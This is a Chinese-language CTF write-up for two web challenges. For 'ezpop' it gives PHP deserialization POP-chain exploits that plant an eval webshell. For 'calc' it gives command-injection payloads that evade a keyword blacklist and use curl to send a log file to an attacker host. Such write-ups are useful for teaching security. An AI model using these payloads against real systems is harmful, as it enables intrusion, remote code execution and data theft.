2022DASCTF X SU 三月春季挑战赛（web）

ezpop

<?php

class crow
{
    public $v1;
    public $v2;
    function eval() {
        echo new $this->v1($this->v2);
    }
    public function __invoke()
    {
        $this->v1->world();
    }
}
class fin
{
    public $f1;
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }
    public function run()
    {
        ($this->f1)();
    }
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}
class what
{
    public $a;
    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;
    public function run()
    {
        ($this->m1)();
    }
    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}
if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

首先起点是fin类中的__destruct()方法，终点mix类中的get_flag方法

看下上面调用get_flag的只有fin类中的__call()方法，也就是也要找到一个不存在的方法

注意到crow类中__innvoke()方法中调用了world()方法可以触发，但是注意到有两个run方法

所以这道题目有两个链子

一、

流程：

起点->fin::__destruct()->what::__toString()->fin::run()->corw::__invoke()->fin::__call()->mix:::get_flag()

exp：

<?php
class crow{
    public $v1;
}

class fin{
    public $f1;
}
class what
{
    public $a;

}
class mix
{
    public $m1='?><?php eval($_POST[1]);';
}

$F1 = new fin();
$F2 = new fin();
$F3 = new fin();
$c = new crow();
$w = new what();
$m = new mix();
$m2= new mix();

$F1->f1 =  $w;
$w->a =  $F2;
$F2->f1 = $c;
$c->v1 =  $F3;
$F3->f1 = $m;
echo serialize($F1);
?>

payload

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":1:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:24:"
?><
?php eval($_POST[1]);";}}}}}}
&1=system('cat H0mvz850F.php');

二、

起点->fin::__destruct()->what::__toString()->mix::run()->corw::__invoke()->fin::__call()->mix:::get_flag()

exp：

<?php
class crow{
    public $v1;
}

class fin{
    public $f1;
}
class what
{
    public $a;

}
class mix
{
    public $m1='?><?php eval($_POST[1]);';
}

$F1 = new fin();
$F2 = new fin();
$c = new crow();
$w = new what();
$m = new mix();
$m2= new mix();

$F1->f1 =  $w;
$w->a =  $m;
$m->m1 = $c;
$c->v1 =  $F2;
$F2->f1 =  $m2;
echo serialize($F1);
?>

payload:

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":1:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:24:"?><?php eval($_POST[1]);";}}}}}}
&1=system('cat H0mvz850F.php');

calc

题目这边给了附件

app.py

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app=Flask(__name__)

def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    

@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

    

if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

其中calc路由，可以接受num参数，并且在log出有命令执行

接着

data = eval(num)
            os.system(log)

那这里就可以执行任意命令了

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:5678/%23ls

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:5678/%23cat%09Th1s*